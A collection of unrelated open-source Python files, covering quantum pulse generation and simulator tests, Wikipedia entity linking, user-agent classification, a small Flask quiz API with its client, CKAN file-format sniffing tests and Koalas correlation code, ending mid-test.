Must be greater than zero. amp: Pulse amplitude at `duration/2`. sigma: Width (standard deviation) of pulse. name: Name of pulse. """ center = duration/2 return _sampled_sech_pulse(duration, amp, center, sigma, name=name) _sampled_sech_deriv_pulse = samplers.left(continuous.sech_deriv) def sech_deriv(duration: int, amp: complex, sigma: float, name: str = None) -> SamplePulse: r"""Generates unnormalized sech derivative `SamplePulse`. Applies `left` sampling strategy to generate discrete pulse from continuous function. Args: duration: Duration of pulse. Must be greater than zero. amp: Pulse amplitude at `center`. sigma: Width (standard deviation) of pulse. name: Name of pulse. """ center = duration/2 return _sampled_sech_deriv_pulse(duration, amp, center, sigma, name=name) _sampled_gaussian_square_pulse = samplers.left(continuous.gaussian_square) def gaussian_square(duration: int, amp: complex, sigma: float, risefall: int, name: Optional[str] = None) -> SamplePulse: """Generates gaussian square `SamplePulse`. Centered at `duration/2` and zeroed at `t=-1` and `t=duration+1` to prevent large initial/final discontinuities. Applies `left` sampling strategy to generate discrete pulse from continuous function. Args: duration: Duration of pulse. Must be greater than zero. amp: Pulse amplitude. sigma: Width (standard deviation) of gaussian rise/fall portion of the pulse. risefall: Number of samples over which pulse rise and fall happen. Width of square portion of pulse will be `duration-2*risefall`. name: Name of pulse. """ center = duration/2 width = duration-2*risefall zeroed_width = duration + 2 return _sampled_gaussian_square_pulse(duration, amp, center, width, sigma, zeroed_width=zeroed_width, name=name) _sampled_drag_pulse = samplers.left(continuous.drag) def drag(duration: int, amp: complex, sigma: float, beta: float, name: Optional[str] = None) -> SamplePulse: r"""Generates Y-only correction DRAG `SamplePulse` for standard nonlinear oscillator (SNO) [1]. Centered at `duration/2` and zeroed at `t=-1` to prevent large initial discontinuity. Applies `left` sampling strategy to generate discrete pulse from continuous function. [1] <NAME>., <NAME>., <NAME>. & <NAME>. Analytic control methods for high-fidelity unitary operations in a weakly nonlinear oscillator. Phys. Rev. A 83, 012308 (2011). Args: duration: Duration of pulse. Must be greater than zero. 
amp: Pulse amplitude at `center`. sigma: Width (standard deviation) of pulse. beta: Y correction amplitude. For the SNO this is $\beta=-\frac{\lambda_1^2}{4\Delta_2}$. Where $\lambds_1$ is the relative coupling strength between the first excited and second excited states and $\Delta_2$ is the detuning between the respective excited states. name: Name of pulse. """ center = duration/2 zeroed_width = duration + 2 return _sampled_drag_pulse(duration, amp, center, sigma, beta, zeroed_width=zeroed_width, rescale_amp=True, name=name) ``` #### File: python/basicaer/test_qasm_simulator.py ```python import unittest import numpy as np from qiskit import execute from qiskit import ClassicalRegister, QuantumCircuit, QuantumRegister from qiskit.compiler import transpile, assemble from qiskit.providers.basicaer import QasmSimulatorPy from qiskit.test import Path from qiskit.test import providers class TestBasicAerQasmSimulator(providers.BackendTestCase): """Test the Basic qasm_simulator.""" backend_cls = QasmSimulatorPy def setUp(self): super(TestBasicAerQasmSimulator, self).setUp() self.seed = 88 qasm_filename = self._get_resource_path('example.qasm', Path.QASMS) transpiled_circuit = QuantumCircuit.from_qasm_file(qasm_filename) transpiled_circuit.name = 'test' transpiled_circuit = transpile(transpiled_circuit, backend=self.backend) self.qobj = assemble(transpiled_circuit, shots=1000) def test_qasm_simulator_single_shot(self): """Test single shot run.""" shots = 1 self.qobj.config.shots = shots result = self.backend.run(self.qobj).result() self.assertEqual(result.success, True) def test_qasm_simulator_measure_sampler(self): """Test measure sampler if qubits measured more than once.""" shots = 100 qr = QuantumRegister(2, 'qr') cr = ClassicalRegister(4, 'cr') circuit = QuantumCircuit(qr, cr) circuit.x(qr[1]) circuit.measure(qr[0], cr[0]) circuit.measure(qr[1], cr[1]) circuit.measure(qr[1], cr[2]) circuit.measure(qr[0], cr[3]) target = {'0110': shots} job = execute( circuit, backend=self.backend, shots=shots, seed_simulator=self.seed) result = job.result() counts = result.get_counts(0) self.assertEqual(counts, target) def test_qasm_simulator(self): """Test data counts output for single circuit run against reference.""" result = self.backend.run(self.qobj).result() shots = 1024 threshold = 0.04 * shots counts = result.get_counts('test') target = {'100 100': shots / 8, '011 011': shots / 8, '101 101': shots / 8, '111 111': shots / 8, '000 000': shots / 8, '010 010': shots / 8, '110 110': shots / 8, '001 001': shots / 8} self.assertDictAlmostEqual(counts, target, threshold) def test_if_statement(self): """Test if statements.""" shots = 100 qr = QuantumRegister(3, 'qr') cr = ClassicalRegister(3, 'cr') circuit_if_true = QuantumCircuit(qr, cr) circuit_if_true.x(qr[0]) circuit_if_true.x(qr[1]) circuit_if_true.measure(qr[0], cr[0]) circuit_if_true.measure(qr[1], cr[1]) circuit_if_true.x(qr[2]).c_if(cr, 0x3) circuit_if_true.measure(qr[0], cr[0]) circuit_if_true.measure(qr[1], cr[1]) circuit_if_true.measure(qr[2], cr[2]) circuit_if_false = QuantumCircuit(qr, cr) circuit_if_false.x(qr[0]) circuit_if_false.measure(qr[0], cr[0]) circuit_if_false.measure(qr[1], cr[1]) circuit_if_false.x(qr[2]).c_if(cr, 0x3) circuit_if_false.measure(qr[0], cr[0]) circuit_if_false.measure(qr[1], cr[1]) circuit_if_false.measure(qr[2], cr[2]) job = execute([circuit_if_true, circuit_if_false], backend=self.backend, shots=shots, seed_simulator=self.seed) result = job.result() counts_if_true = result.get_counts(circuit_if_true) counts_if_false 
= result.get_counts(circuit_if_false) self.assertEqual(counts_if_true, {'111': 100}) self.assertEqual(counts_if_false, {'001': 100}) def test_teleport(self): """Test teleportation as in tutorials""" self.log.info('test_teleport') pi = np.pi shots = 2000 qr = QuantumRegister(3, 'qr') cr0 = ClassicalRegister(1, 'cr0') cr1 = ClassicalRegister(1, 'cr1') cr2 = ClassicalRegister(1, 'cr2') circuit = QuantumCircuit(qr, cr0, cr1, cr2, name='teleport') circuit.h(qr[1]) circuit.cx(qr[1], qr[2]) circuit.ry(pi/4, qr[0]) circuit.cx(qr[0], qr[1]) circuit.h(qr[0]) circuit.barrier(qr) circuit.measure(qr[0], cr0[0]) circuit.measure(qr[1], cr1[0]) circuit.z(qr[2]).c_if(cr0, 1) circuit.x(qr[2]).c_if(cr1, 1) circuit.measure(qr[2], cr2[0]) job = execute(circuit, backend=self.backend, shots=shots, seed_simulator=self.seed) results = job.result() data = results.get_counts('teleport') alice = { '00': data['0 0 0'] + data['1 0 0'], '01': data['0 1 0'] + data['1 1 0'], '10': data['0 0 1'] + data['1 0 1'], '11': data['0 1 1'] + data['1 1 1'] } bob = { '0': data['0 0 0'] + data['0 1 0'] + data['0 0 1'] + data['0 1 1'], '1': data['1 0 0'] + data['1 1 0'] + data['1 0 1'] + data['1 1 1'] } self.log.info('test_teleport: circuit:') self.log.info(circuit.qasm()) self.log.info('test_teleport: data %s', data) self.log.info('test_teleport: alice %s', alice) self.log.info('test_teleport: bob %s', bob) alice_ratio = 1/np.tan(pi/8)**2 bob_ratio = bob['0']/float(bob['1']) error = abs(alice_ratio - bob_ratio) / alice_ratio self.log.info('test_teleport: relative error = %s', error) self.assertLess(error, 0.05) def test_memory(self): """Test memory.""" qr = QuantumRegister(4, 'qr') cr0 = ClassicalRegister(2, 'cr0') cr1 = ClassicalRegister(2, 'cr1') circ = QuantumCircuit(qr, cr0, cr1) circ.h(qr[0]) circ.cx(qr[0], qr[1]) circ.x(qr[3]) circ.measure(qr[0], cr0[0]) circ.measure(qr[1], cr0[1]) circ.measure(qr[2], cr1[0]) circ.measure(qr[3], cr1[1]) shots = 50 job = execute(circ, backend=self.backend, shots=shots, memory=True) result = job.result() memory = result.get_memory() self.assertEqual(len(memory), shots) for mem in memory: self.assertIn(mem, ['10 00', '10 11']) def test_unitary(self): """Test unitary gate instruction""" max_qubits = 4 x_mat = np.array([[0, 1], [1, 0]]) # Test 1 to max_qubits for random n-qubit unitary gate for i in range(max_qubits): num_qubits = i + 1 # Apply X gate to all qubits multi_x = x_mat for _ in range(i): multi_x = np.kron(multi_x, x_mat) # Target counts shots = 100 target_counts = {num_qubits * '1': shots} # Test circuit qr = QuantumRegister(num_qubits, 'qr') cr = ClassicalRegister(num_qubits, 'cr') circuit = QuantumCircuit(qr, cr) circuit.unitary(multi_x, qr) circuit.measure(qr, cr) job = execute(circuit, self.backend, shots=shots) result = job.result() counts = result.get_counts(0) self.assertEqual(counts, target_counts) if __name__ == '__main__': unittest.main() ```
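The discrete pulse factories in `discrete.py` all share the same call shape: a sample count plus shape parameters, returning a `SamplePulse`. A short usage sketch, assuming a qiskit-terra release contemporary with this code (one where `qiskit.pulse.pulse_lib` exists); the durations, amplitudes and names are made-up values:

```python
from qiskit.pulse.pulse_lib import discrete

# 160-sample Gaussian envelope (illustrative amplitude and width)
x_pulse = discrete.gaussian(duration=160, amp=0.2, sigma=40, name='x_pulse')

# Flat-top measurement pulse: 300 samples total with 20-sample
# Gaussian rise/fall, so the square portion is 300 - 2*20 = 260 samples
m_pulse = discrete.gaussian_square(duration=300, amp=0.1, sigma=5,
                                   risefall=20, name='measure_pulse')

print(x_pulse.duration, m_pulse.duration)  # 160 300
```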
{ "source": "904labs/semanticizest", "score": 3 }
#### File: semanticizest/semanticizest/_semanticizer.py
```python
from collections import defaultdict
import sqlite3
from os.path import join, dirname, abspath

import six

from semanticizest._util import ngrams_with_pos, tosequence
from semanticizest.parse_wikidump import parse_dump


class Semanticizer(object):
    """Entity linker.

    This is the main class for using Semanticizest. It's a handle on a
    statistical model that lives on disk.

    Parameters
    ----------
    fname : string
        Filename of the stored model from which to load the Wikipedia
        statistics. Loading is lazy; the underlying file should not be
        modified while any Semanticizer is using it.
    """

    def __init__(self, fname):
        """Create a semanticizer from a stored model."""
        commonness = defaultdict(list)

        self.db = sqlite3.connect(fname)
        self._cur = self.db.cursor()

        for target, anchor, count in self._get_senses_counts():
            commonness[anchor].append((target, count))
        for anchor, targets in six.iteritems(commonness):
            # targets.sort(key=operator.itemgetter(1), reverse=True)
            # Turn counts into probabilities.
            # XXX should we preserve the counts as well?
            total = float(sum(count for _, count in targets))
            commonness[anchor] = [(t, count / total) for t, count in targets]

        self.commonness = commonness
        self.N = self._get_ngram_max_length()

    def _get_ngram_max_length(self):
        self._cur.execute("select value "
                          "from parameters "
                          "where key = 'N';")
        N = self._cur.fetchone()[0]
        if N == 'None':
            N = None
        else:
            N = int(N)
        return N

    def _get_senses_counts(self):
        """Return all senses and their counts."""
        return self._cur.execute('select target, ngram as anchor, count '
                                 'from linkstats, ngrams '
                                 'where ngram_id = ngrams.id;')

    def all_candidates(self, s):
        """Retrieve all candidate entities from a piece of text.

        Parameters
        ----------
        s : {string, iterable over string}
            Tokens. If a string, it will be tokenized using a naive
            heuristic.

        Returns
        -------
        candidates : iterable over (int, int, string, float)
            Candidate entities are 4-tuples of the indices `start` and
            `end` (both in tokenized input, and both start at 1),
            `target entity` (title of the Wikipedia article) and
            `probability` (commonness.)
        """
        if isinstance(s, six.string_types):
            # XXX need a smarter tokenizer!
            s = s.split()
        else:
            s = tosequence(s)

        for i, j, s in ngrams_with_pos(s, self.N):
            if s in self.commonness:
                for target, prob in self.commonness[s]:
                    yield i, j, target, prob


def create_model(dump, db_file=':memory:', N=2):
    """Create a semanticizer model from a wikidump and store it in a DB.

    Parameters
    ----------
    dump : string
        Filename of a Wikipedia dump, e.g.,
        'enwiki-20141106-pages-articles.xml.bz2'
    db_file : string
        (File)name of the sqlite3 DB. If `db_file` is `:memory:`, an
        in-memory db will be created, otherwise it is the filename of
        the disk-based db.

    Returns
    -------
    db : sqlite3.Connection
        The handle to the newly created db containing the model.
    """
    db = sqlite3.connect(db_file)
    _parse_stuff_to_db(dump, db, N=N)
    return db


def _parse_stuff_to_db(fname, db, N=2):
    """Parses a wikidump and stores the model in the supplied db."""
    cur = db.cursor()
    with open(createtables_path()) as create:
        cur.executescript(create.read())
    dump = join(dirname(abspath(__file__)), fname)
    parse_dump(dump, db, N=N)
    return db


def createtables_path():
    """Return the full path to the DB initialization script."""
    return join(dirname(__file__), "createtables.sql")
```
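A short usage sketch for the two public entry points above (the dump and model file names are hypothetical):

```python
from semanticizest._semanticizer import Semanticizer, create_model

# One-off: build a model from a Wikipedia dump into an on-disk sqlite3 file.
create_model('enwiki-20141106-pages-articles.xml.bz2',
             db_file='enwiki.model.sqlite3')

# Then link entities; candidates are (start, end, target, commonness) tuples.
sem = Semanticizer('enwiki.model.sqlite3')
for start, end, target, prob in sem.all_candidates('the president of the United States'):
    print(start, end, target, prob)
```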
{ "source": "904labs/user-agent-ml", "score": 3 }
#### File: user-agent-ml/user_agent_ml/predict.py
```python
from features import extract_features
from docopt import docopt
import util

args = docopt(__doc__)


def predict(clf, ua, vocabulary):
    """Predict whether a user-agent string belongs to a (mobile) browser."""
    X = extract_features(ua, vocabulary)
    pred = clf.predict(X.toarray())
    return X, pred


if __name__ == "__main__":
    import cPickle as pickle
    import sys

    clf, vocabulary = pickle.load(open(args["<MODEL>"], "rb"))

    if len(sys.argv) != 3:
        print >> sys.stderr, "Usage: %s clf input_file" % sys.argv[0]
        sys.exit(1)

    count = 0
    correct = 0
    samples, _ = util.read(args["<DATABASE>"])
    for ua, label in samples:
        X, Y_pred = predict(clf, ua, vocabulary)
        count += 1
        if label == Y_pred:
            correct += 1
        else:
            print ua, label, Y_pred[0]
            print X
            print

    print "Total: %d, Correct: %d, Ratio: %.2f" % (count, correct, (1. * correct / count))
```
#### File: user-agent-ml/user_agent_ml/util.py
```python
import sqlite3
import collections
import re


def read(dbfilename):
    # Open the database
    conn = sqlite3.connect(dbfilename)
    conn.text_factory = str
    c = conn.cursor()

    # Query all labelled user-agent strings
    c.execute('SELECT uaString, Type FROM data')

    counter = 0
    vocabulary = {}
    samples = []
    for item in c:
        # Browsers (desktop and mobile) are the positive class
        if item[1] in ["Browser", "Mobile Browser"]:
            label = 1
        else:
            label = 0
        uaString = item[0]
        samples.append((uaString, label))
        # Build the token vocabulary as we go
        for token in gentokenlist(uaString):
            if token not in vocabulary:
                vocabulary[token] = counter
                counter += 1
    return samples, vocabulary


def ngrams(text, ngram=3):
    return map(lambda x: text[x:x + ngram], xrange(len(text) - ngram + 1))
# end of ngrams


def gentokenlist(uaString):
    tokenlist = []
    for x in re.split('[.(),;/\s]', uaString.lower()):
        x = x.strip()
        if x:  # skip empty tokens
            tokenlist.append(rewrite(x))
    return tokenlist


def rewrite(x):
    # Performs various token rewrites
    # Strip whitespace
    x = x.strip()
    # Rewrite numbers to their length
    if x.isdigit():
        return str(len(x))  # return length of number
    # Rewrite the common +http: token to http:
    elif x == "+http:":
        return "http:"
    # Common case - return the original string
    else:
        return x
```
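The token rewrites in `util.py` are easiest to see on a concrete user-agent string. A small sketch (Python 2, to match the code above; the example string is illustrative):

```python
from util import gentokenlist, rewrite

ua = "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"

# Splitting happens on '.', '(', ')', ',', ';', '/' and whitespace, then
# each token is rewritten: runs of digits collapse to their length and
# "+http:" is normalised to "http:".
print gentokenlist(ua)

print rewrite('2014')    # -> '4'  (a 4-digit number)
print rewrite('+http:')  # -> 'http:'
print rewrite('mozilla') # -> 'mozilla' (unchanged)
```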
{ "source": "905902029/group3_aip_a", "score": 3 }
#### File: 905902029/group3_aip_a/putin-judge.py
```python
def putin():
    print("Please enter a word!")
    w = input("input:")
    return w


def judgeword(w):
    # Keep prompting until the word consists only of lowercase letters
    while not w.islower():
        print("Not all lowercase letters; please enter the word again")
        w = putin()
    print("All lowercase letters -- accepted")
    return w


def countword(w):
    # Count the occurrences of each character
    res = {}
    for i in w:
        res[i] = w.count(i)
    c = len(res)
    print("The input string contains %d distinct letters" % c)


aa = putin()
aa = judgeword(aa)
countword(aa)
```
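For reference, the per-character counting in `countword` can be done in one step with the standard library. A small sketch:

```python
from collections import Counter


def countword(w):
    res = Counter(w)  # maps each letter to its occurrence count
    print("The input string contains %d distinct letters" % len(res))


countword("hello")  # h, e, l, o -> 4 distinct letters
```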
{ "source": "908Inc/ckanext-qa", "score": 2 }
#### File: qa/tests/test_sniff_format.py
```python
import os
import logging

from nose.tools import assert_equal

from ckanext.qa.sniff_format import sniff_file_format, is_json, is_ttl, turtle_regex

logging.basicConfig(level=logging.INFO)
log = logging.getLogger('ckan.sniff')


class TestSniffFormat:
    @classmethod
    def setup_class(cls):
        # Assemble a list of the test fixture data files.
        # They MUST have a file extension equal to the format they will be correctly
        # sniffed as. e.g. .xls or .xls.zip
        cls.fixture_files = []  # (format_extension, filepath)
        fixture_data_dir = os.path.join(os.path.dirname(__file__), 'data')
        for filename in os.listdir(fixture_data_dir):
            format_extension = '.'.join(filename.split('.')[1:]).replace('_', ' ')
            filepath = os.path.join(fixture_data_dir, filename)
            cls.fixture_files.append((format_extension, filepath))

    @classmethod
    def assert_file_has_format_sniffed_correctly(cls, format_extension, filepath):
        '''Given a filepath, checks the sniffed format matches the format_extension.'''
        expected_format = format_extension
        sniffed_format = sniff_file_format(filepath, log)
        assert sniffed_format, expected_format
        expected_format_without_zip = expected_format.replace('.zip', '')
        assert_equal(sniffed_format['format'].lower(), expected_format_without_zip)
        expected_container = None
        if expected_format.endswith('.zip'):
            expected_container = 'ZIP'
        elif expected_format.endswith('.gzip'):
            expected_container = 'ZIP'  # lumped together with zip for simplicity now
        assert_equal(sniffed_format.get('container'), expected_container)

    #def test_all(self):
    #    for format_extension, filepath in self.fixture_files:
    #        self.assert_file_has_format_sniffed_correctly(format_extension, filepath)

    @classmethod
    def check_format(cls, format, filename=None):
        for format_extension, filepath in cls.fixture_files:
            if format_extension == format:
                if filename:
                    if filename in filepath:
                        break
                    else:
                        continue
                else:
                    break
        else:
            assert 0, format  # Could not find fixture for format
        cls.assert_file_has_format_sniffed_correctly(format_extension, filepath)

    def test_xls(self):
        self.check_format('xls', '10-p108-data-results')

    def test_xls1(self):
        self.check_format('xls', 'August-2010.xls')

    def test_xls2(self):
        self.check_format('xls', 'ukti-admin-spend-nov-2011.xls')

    def test_xls3(self):
        self.check_format('xlsx', 'decc_local_authority_data_xlsx.xls')

    def test_xls_zip(self):
        self.check_format('xls.zip', 'telephone-network-data.xls.zip')

    def test_rdf(self):
        self.check_format('rdf', '300911---EH---organogram---ver1.rdf')

    def test_rdf2(self):
        self.check_format('rdf', 'ukk1202-36000.rdf')

    def test_pdf(self):
        self.check_format('pdf')

    def test_kml(self):
        self.check_format('kml')

    def test_rdfa(self):
        self.check_format('rdfa')

    def test_doc(self):
        self.check_format('doc')

    def test_json(self):
        self.check_format('json')

    def test_ods(self):
        self.check_format('ods')

    def test_odt(self):
        self.check_format('odt')

    def test_odp(self):
        self.check_format('odp')

    def test_ppt(self):
        self.check_format('ppt')

    def test_csv(self):
        self.check_format('csv', 'elec00.csv')

    def test_csv1(self):
        self.check_format('csv', 'spendover25kdownloadSep.csv')

    def test_csv2(self):
        self.check_format('csv', '311011.csv')

    def test_csv3(self):
        self.check_format('csv', 'FCOServices_TransparencySpend_May2011.csv')

    def test_csv4(self):
        self.check_format('csv', 'iwfg09_Phos_river_200911.csv')

    def test_csv5(self):
        self.check_format('csv', '9_sus_fisheries_201003.csv')

    def test_csv6(self):
        self.check_format('csv', 'Inpatients_MHA_Machine_readable_dataset_1011.csv')

    def test_shp(self):
        self.check_format('shp', 'HS2-ARP-00-GI-RW-00434_RCL_V4.shp')

    def test_shp2(self):
        self.check_format('shp', 'jncc_shapefile.shp')

    def test_gtfs(self):
        self.check_format('gtfs', 'manchester.gtfs')

    def test_html(self):
        self.check_format('html', 'index.html')

    def test_html1(self):
        self.check_format('html', '6a7baac6-d363-4a9d-8e9d-e584f38c05c3.html')

    def test_html2(self):
        self.check_format('html', 'hourly_means.html')

    def test_xml(self):
        self.check_format('xml', 'jobs.xml')

    def test_xml1(self):
        self.check_format('xml', '082010CreditorInvoicesover500.xml')

    def test_xml2(self):
        self.check_format('xml', 'DfidProjects-trunc.xml')

    def test_iati(self):
        self.check_format('iati')

    def test_rss(self):
        self.check_format('rss')

    def test_txt(self):
        self.check_format('txt')

    def test_txt_2(self):
        self.check_format('txt', 'terrible_csv.txt')

    def test_csv_zip(self):
        self.check_format('csv.zip', 'written_complains.csv.zip')

    def test_csv_zip1(self):
        self.check_format('csv.zip', 'cycle-area-list.csv.zip')

    def test_txt_zip(self):
        self.check_format('txt.zip')

    def test_xml_zip(self):
        self.check_format('xml.zip', 'FHRS501en-GB.xml.zip')

    #def test_torrent(self):
    #    self.check_format('torrent')

    def test_psv(self):
        self.check_format('psv')

    def test_wms_1_3(self):
        self.check_format('wms', 'afbi_get_capabilities.wms')

    def test_wms_1_1_1(self):
        self.check_format('wms', 'oldham_get_capabilities.wms')

    def test_wfs_1_0(self):
        self.check_format('wfs', 'blaby_get_capabilities_1_0.wfs')

    def test_wfs_1_1(self):
        self.check_format('wfs', 'blaby_get_capabilities_1_1.wfs')

    def test_wfs_2_0(self):
        self.check_format('wfs', 'blaby_get_capabilities_2_0.wfs')

    def test_wmts(self):
        self.check_format('wmts', 'ukho_bathymetry.wmts')

    def test_wcs(self):
        self.check_format('wcs', 'ukho_bathymetry.wcs')

    def test_wcs2(self):
        self.check_format('wcs', 'ukho_bathymetry2.wcs')

    #def test_ics(self):
    #    self.check_format('ics')

    def test_ttl1(self):
        self.check_format('ttl', 'turtle.ttl')

    def test_ttl2(self):
        self.check_format('ttl', 'turtle-imd-education-score-2010.ttl')

    def test_ttl3(self):
        self.check_format('ttl', 'turtle-homelessness-acceptances-per-1000.ttl')

    def test_atom(self):
        self.check_format('atom feed', 'os_products.atom_feed')

    def test_atom1(self):
        self.check_format('atom feed', 'SG_HumanHealthSafety.atom_feed')


def test_is_json():
    assert is_json('5', log)
    assert is_json('-5', log)
    assert is_json('-5.4', log)
    assert is_json('-5.4e5', log)
    assert is_json('-5.4e-5', log)
    assert not is_json('4.', log)
    assert is_json('"hello"', log)
    assert not is_json('hello"', log)
    assert is_json('["hello"]', log)
    assert not is_json('"hello"]', log)
    assert is_json('[5]', log)
    assert is_json('[5, 6]', log)
    assert is_json('[5,6]', log)
    assert is_json('["cat", 6]', log)
    assert is_json('{"cat": 6}', log)
    assert is_json('{"cat":6}', log)
    assert is_json('{"cat": "bob"}', log)
    assert is_json('{"cat": [1, 2]}', log)
    assert is_json('{"cat": [1, 2], "dog": 5, "rabbit": "great"}', log)
    assert not is_json('{"cat": [1, 2}]', log)
    assert is_json('[{"cat": [1]}, 2]', log)
    # false positives of the algorithm:
    #assert not is_json('[{"cat": [1]}2, 2]', log)


def test_turtle_regex():
    template = '<subject> <predicate> %s .'
    assert turtle_regex().search(template % '<url>')
    assert turtle_regex().search(template % '"a literal"')
    assert turtle_regex().search(template % '"translation"@ru')
    assert turtle_regex().search(template % '"literal type"^^<http://www.w3.org/2001/XMLSchema#string>')
    assert turtle_regex().search(template % '"literal typed with prefix"^^xsd:string')
    assert turtle_regex().search(template % "'single quotes'")
    assert turtle_regex().search(template % '"""triple quotes but not multiline"""')
    assert turtle_regex().search(template % "'''triple quotes but not multiline'''")
    assert turtle_regex().search(template % '12')
    assert turtle_regex().search(template % '1.12')
    assert turtle_regex().search(template % '.12')
    assert turtle_regex().search(template % '12E12')
    assert turtle_regex().search(template % '-4.2E-9')
    assert turtle_regex().search(template % 'false')
    assert turtle_regex().search(template % '_:blank_node')
    assert turtle_regex().search('<s> <p> <o> ;\n <p> <o> .')
    assert turtle_regex().search('<s> <p> <o>;<p> <o>.')
    # Include triples which are part of a nest:
    assert turtle_regex().search('<s> <p> <o> ;')
    assert turtle_regex().search('<s> <p> <o>;')
    assert turtle_regex().search(' ;<p> <o>.')
    assert turtle_regex().search(';\n<p> <o>.')
    assert turtle_regex().search(';\n<p> <o>;')
    assert not turtle_regex().search('<s> <p> <o>. rubbish')
    assert not turtle_regex().search(template % 'word')
    assert not turtle_regex().search(template % 'prefix:node')


def test_is_ttl__num_triples():
    triple = '<subject> <predicate> <object>; <predicate> <object>.'
    assert not is_ttl('\n'.join([triple]*2), log)
    assert is_ttl('\n'.join([triple]*5), log)
```
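The fixtures above encode the expected format in the file extension; outside the test suite, `sniff_file_format` can also be called directly. A sketch based on the signature and return shape used in the tests (the file path is hypothetical):

```python
import logging

from ckanext.qa.sniff_format import sniff_file_format

log = logging.getLogger('ckan.sniff')

# Returns a dict like {'format': 'XLS', 'container': 'ZIP'} or None/falsy
# if the format could not be determined.
info = sniff_file_format('/tmp/downloaded_resource', log)
if info:
    log.info('Sniffed format: %s (container: %s)',
             info['format'], info.get('container'))
```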
{ "source": "909041282/python-docs-hello-world", "score": 3 }
#### File: 909041282/python-docs-hello-world/app.py
```python
import json

from flask import Flask, abort, request

from paper import Papers

app = Flask(__name__)
papers = Papers('./data/心理咨询师/')


@app.route("/")
def hello():
    return "Hello, World!"


@app.route("/index")
def index():
    return "Hello, index!"


@app.route("/get_question", methods=['GET', 'POST'])
def getQuestion():
    try:
        data = json.loads(request.data)
        if data['function'] == 'allPaper':
            result = papers.getAllPaper()
        elif data['function'] == 'paper':
            result = papers.getAllQuestion(data['paper_name'])
        elif data['function'] == 'question':
            result = papers.getQuestion(
                data['paper_name'], data['type'], data['num'])
        return json.dumps(result)
    except Exception:
        # Any malformed request (bad JSON, missing keys, unknown function)
        # is reported as a server error.
        abort(500)
```
#### File: 909041282/python-docs-hello-world/client.py
```python
import json

import requests

remote_url = 'https://miracleiweb.azurewebsites.net/'
local_url = 'http://127.0.0.1:5000/'


def getUrl(data):
    ret = requests.get(remote_url + 'get_question', data=json.dumps(data))
    print(json.loads(ret.text))


def getQuestion():
    data = {
        'function': 'question',
        'paper_name': '01',
        'type': 'single',
        "num": 1
    }
    getUrl(data)


def getAllPapers():
    data = {
        'function': 'allPaper',
    }
    getUrl(data)


def getPaper():
    data = {
        'function': 'paper',
        'paper_name': '01'
    }
    getUrl(data)


if __name__ == "__main__":
    getQuestion()
    getAllPapers()
    getPaper()
```
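The `/get_question` endpoint can also be exercised without a running server via Flask's built-in test client; a short sketch (the paper name `'01'` follows `client.py` above):

```python
import json

from app import app

client = app.test_client()
resp = client.post('/get_question',
                   data=json.dumps({'function': 'paper', 'paper_name': '01'}))
print(resp.status_code)
print(resp.data)
```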
{ "source": "90jam/koalas", "score": 3 }
#### File: databricks/koalas/ml.py ```python from typing import List, Tuple, TYPE_CHECKING import numpy as np import pandas as pd import pyspark from pyspark.ml.feature import VectorAssembler from pyspark.ml.stat import Correlation from databricks.koalas.utils import column_labels_level if TYPE_CHECKING: import databricks.koalas as ks CORRELATION_OUTPUT_COLUMN = "__correlation_output__" def corr(kdf: "ks.DataFrame", method: str = "pearson") -> pd.DataFrame: """ The correlation matrix of all the numerical columns of this dataframe. Only accepts scalar numerical values for now. :param kdf: the Koalas dataframe. :param method: {'pearson', 'spearman'} * pearson : standard correlation coefficient * spearman : Spearman rank correlation :return: :class:`pandas.DataFrame` >>> ks.DataFrame({'A': [0, 1], 'B': [1, 0], 'C': ['x', 'y']}).corr() A B A 1.0 -1.0 B -1.0 1.0 """ assert method in ("pearson", "spearman") ndf, column_labels = to_numeric_df(kdf) corr = Correlation.corr(ndf, CORRELATION_OUTPUT_COLUMN, method) pcorr = corr.toPandas() arr = pcorr.iloc[0, 0].toArray() if column_labels_level(column_labels) > 1: idx = pd.MultiIndex.from_tuples(column_labels) else: idx = pd.Index([label[0] for label in column_labels]) return pd.DataFrame(arr, columns=idx, index=idx) def to_numeric_df(kdf: "ks.DataFrame") -> Tuple[pyspark.sql.DataFrame, List[Tuple[str, ...]]]: """ Takes a dataframe and turns it into a dataframe containing a single numerical vector of doubles. This dataframe has a single field called '_1'. TODO: index is not preserved currently :param kdf: the Koalas dataframe. :return: a pair of dataframe, list of strings (the name of the columns that were converted to numerical types) >>> to_numeric_df(ks.DataFrame({'A': [0, 1], 'B': [1, 0], 'C': ['x', 'y']})) (DataFrame[__correlation_output__: vector], [('A',), ('B',)]) """ # TODO, it should be more robust. 
    accepted_types = {
        np.dtype(dt)
        for dt in [np.int8, np.int16, np.int32, np.int64, np.float32, np.float64, np.bool_]
    }
    numeric_column_labels = [
        label for label in kdf._internal.column_labels if kdf[label].dtype in accepted_types
    ]
    numeric_df = kdf._sdf.select(
        *[kdf._internal.spark_column_for(idx) for idx in numeric_column_labels]
    )
    va = VectorAssembler(inputCols=numeric_df.columns, outputCol=CORRELATION_OUTPUT_COLUMN)
    v = va.transform(numeric_df).select(CORRELATION_OUTPUT_COLUMN)
    return v, numeric_column_labels
```
#### File: koalas/tests/test_ops_on_diff_frames_groupby.py
```python
import unittest

import pandas as pd

from databricks import koalas as ks
from databricks.koalas.config import set_option, reset_option
from databricks.koalas.testing.utils import ReusedSQLTestCase, SQLTestUtils


class OpsOnDiffFramesGroupByTest(ReusedSQLTestCase, SQLTestUtils):
    @classmethod
    def setUpClass(cls):
        super(OpsOnDiffFramesGroupByTest, cls).setUpClass()
        set_option("compute.ops_on_diff_frames", True)

    @classmethod
    def tearDownClass(cls):
        reset_option("compute.ops_on_diff_frames")
        super(OpsOnDiffFramesGroupByTest, cls).tearDownClass()

    def test_groupby_different_lengths(self):
        pdfs1 = [
            pd.DataFrame({"c": [4, 2, 7, 3, None, 1, 1, 1, 2], "d": list("abcdefght")}),
            pd.DataFrame({"c": [4, 2, 7, None, 1, 1, 2], "d": list("abcdefg")}),
            pd.DataFrame({"c": [4, 2, 7, 3, None, 1, 1, 1, 2, 2], "d": list("abcdefghti")}),
        ]
        pdfs2 = [
            pd.DataFrame({"a": [1, 2, 6, 4, 4, 6, 4, 3, 7], "b": [4, 2, 7, 3, 3, 1, 1, 1, 2]}),
            pd.DataFrame({"a": [1, 2, 6, 4, 4, 6, 4, 7], "b": [4, 2, 7, 3, 3, 1, 1, 2]}),
            pd.DataFrame({"a": [1, 2, 6, 4, 4, 6, 4, 3, 7], "b": [4, 2, 7, 3, 3, 1, 1, 1, 2]}),
        ]

